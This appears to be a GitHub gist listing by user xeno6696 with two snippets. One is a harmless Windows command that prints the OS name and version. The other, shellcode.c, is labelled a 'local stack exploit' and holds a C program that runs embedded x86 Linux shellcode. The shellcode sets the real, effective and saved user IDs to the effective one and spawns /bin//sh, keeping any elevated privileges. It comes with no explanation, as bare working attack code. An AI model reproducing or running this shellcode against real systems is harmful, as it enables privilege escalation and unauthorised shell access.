Skip to content

Instantly share code, notes, and snippets.

View xeno6696's full-sized avatar

Matt Seil xeno6696

View GitHub Profile
@xeno6696
xeno6696 / gist:495c1959de429a7f36bfea223d99f0a0
Created December 19, 2019 23:15
Get Windows Version, command line
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
@xeno6696
xeno6696 / shellcode.c
Created February 22, 2022 03:50
local stack exploit
int main(void) {
char shellcode[] =
"\x90\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x89\xc2\x31\xc0\xb0\xa4\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";
(*(void(*)()) shellcode)();
}